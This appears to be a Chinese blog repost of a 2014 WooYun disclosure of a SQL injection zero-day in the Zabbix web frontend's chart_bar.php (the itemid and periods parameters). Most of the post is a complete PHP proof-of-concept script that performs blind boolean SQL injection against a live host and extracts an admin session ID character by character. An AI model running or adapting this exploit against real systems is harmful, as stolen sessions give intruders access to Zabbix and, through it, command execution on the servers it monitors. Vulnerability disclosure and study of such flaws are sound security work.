Zabbix的前台SQL注射漏洞0day

from http://wooyun.org/bugs/wooyun-2014-072075

在zabbix前端存在一个SQL注射漏洞,由于zabbix前台可以在zabbix的server和client进行命令执行,所以这会导致很严重的后果。

在 /chart_bar.php 的163行代码 获取了一个来自GET,POST,COOKIE的值itemid。

$itemid = $item['itemid'];

最后这个参数进到了SQL查询的过程

http://wooyun.org/upload/201408/121704045cbce0027d8f0fd26109cf834a6694d5.jpg

在同一个文件内的$periods参数也存在一样的问题,导致了一样的SQL注射漏洞。

下方是poc

 

<?php
run_sql("SELECT sessionid from zabbix.sessions where userid in (select userid from zabbix.users) limit 1");
function run_sql($sql) {
    $url = 'http://www.zabbix.org/zabbix/chart_bar.php';
    $data = 'config=1&items[][itemid]=' . rawurlencode('6 and 1=2#');
    $true = strlen(post($url, $data));
    //’“≥§∂»
    for ($i = 0; $i <= 32; $i++) {
        //echo $i."\r\n";
        $data = 'config=1&items[][itemid]=' . rawurlencode('6 and length((' . $sql . ')) = ' . $i . '#');
        $test = strlen(post($url, $data));
        if ($test < ($true - 200)) {
            $length = $i;
            break;
        }
    }
    echo 'Length:' . $length . "\r\n";
    echo 'Result:';
    $chars = array();
    if ($length) {
        for ($l = 0; $l < $length; $l++) {
            $char_list = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@.?-_\/!$%^&*()~';
            for ($c = 0; $c < strlen($char_list); $c++) {
                $data = 'config=1&items[][itemid]=' . rawurlencode('6 and ord(substring((' . $sql . '),' . ($l + 1) . ',1)) = ' . ord($char_list{$c}) . '#');
                $test = strlen(post($url, $data));
                if ($test < ($true - 200)) {
                    echo $char_list{$c};
                    $chars[$l] = $char_list{$c};
                    break;
                }
            }
        }
    }
}
echo "\n";
function post($uri, $data) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $uri);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $return = curl_exec($ch);
    curl_close($ch);
    return $return;
}
?>

发表评论

电子邮件地址不会被公开。 必填项已用*标注